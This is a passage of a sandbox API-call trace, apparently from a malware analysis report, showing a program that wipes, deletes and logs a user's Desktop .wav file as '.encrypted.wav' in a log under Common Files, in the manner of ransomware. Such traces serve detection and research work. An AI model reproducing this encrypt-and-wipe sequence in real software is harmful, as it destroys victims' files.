[0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.590] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0031.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.590] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.590] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0031.590] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.590] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0031.591] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0031.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.592] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f380b0, ftCreationTime.dwHighDateTime=0x1d5c461, ftLastAccessTime.dwLowDateTime=0xdd7f2430, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0xdd7f2430, ftLastWriteTime.dwHighDateTime=0x1d5c14c, nFileSizeHigh=0x0, nFileSizeLow=0xb402, dwReserved0=0x0, dwReserved1=0x777648, cFileName="uzxBvZA9ThehQNQn.wav", cAlternateFileName="UZXBVZ~1.WAV")) returned 0x7c2240 [0031.592] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0031.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.592] CharLowerBuffW (in: lpsz="byte[46082]", cchLength=0xb | out: lpsz="byte[46082]") returned 0xb [0031.592] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.592] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.592] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.593] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.593] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.593] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.594] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\wtgkl2xg7q876lp8absn\\uzxbvza9thehqnqn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0031.594] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.594] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.594] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.594] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.595] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.595] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.595] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.595] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.595] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", lpFilePart=0x0) returned 0x70 [0031.595] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f380b0, ftCreationTime.dwHighDateTime=0x1d5c461, ftLastAccessTime.dwLowDateTime=0xdd7f2430, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0x12b67f00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xb402, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="uzxBvZA9ThehQNQn.wav", cAlternateFileName="UZXBVZ~1.WAV")) returned 0x7c2240 [0031.595] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\wtgkl2xg7q876lp8absn\\uzxbvza9thehqnqn.wav")) returned 1 [0031.596] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f380b0, ftCreationTime.dwHighDateTime=0x1d5c461, ftLastAccessTime.dwLowDateTime=0xdd7f2430, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0x12b67f00, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xb402, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="uzxBvZA9ThehQNQn.wav", cAlternateFileName="UZXBVZ~1.WAV")) returned 0 [0031.596] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.596] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.596] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.596] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.597] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.597] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.597] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.597] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0031.598] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0031.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0031.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.598] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0031.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0031.598] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x91d, lpOverlapped=0x0) returned 1 [0031.598] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0031.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x91d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.598] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0031.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0031.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0031.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.encrypted.wav\r\n", cchWideChar=125, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 125 [0031.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7d) returned 0x7d5bb8 [0031.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.encrypted.wav\r\n", cchWideChar=125, lpMultiByteStr=0x7d5bb8, cbMultiByte=125, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.encrypted.wav\r\n", lpUsedDefaultChar=0x0) returned 125 [0031.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0031.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.599] WriteFile (in: hFile=0x128, lpBuffer=0x7d5b30*, nNumberOfBytesToWrite=0x7c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5b30*, lpNumberOfBytesWritten=0x6aee3c*=0x7c, lpOverlapped=0x0) returned 1 [0031.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0031.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.599] CloseHandle (hObject=0x128) returned 1 [0031.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0031.600] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0031.600] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0031.600] HeapFree (in: hHeap=0x770000, 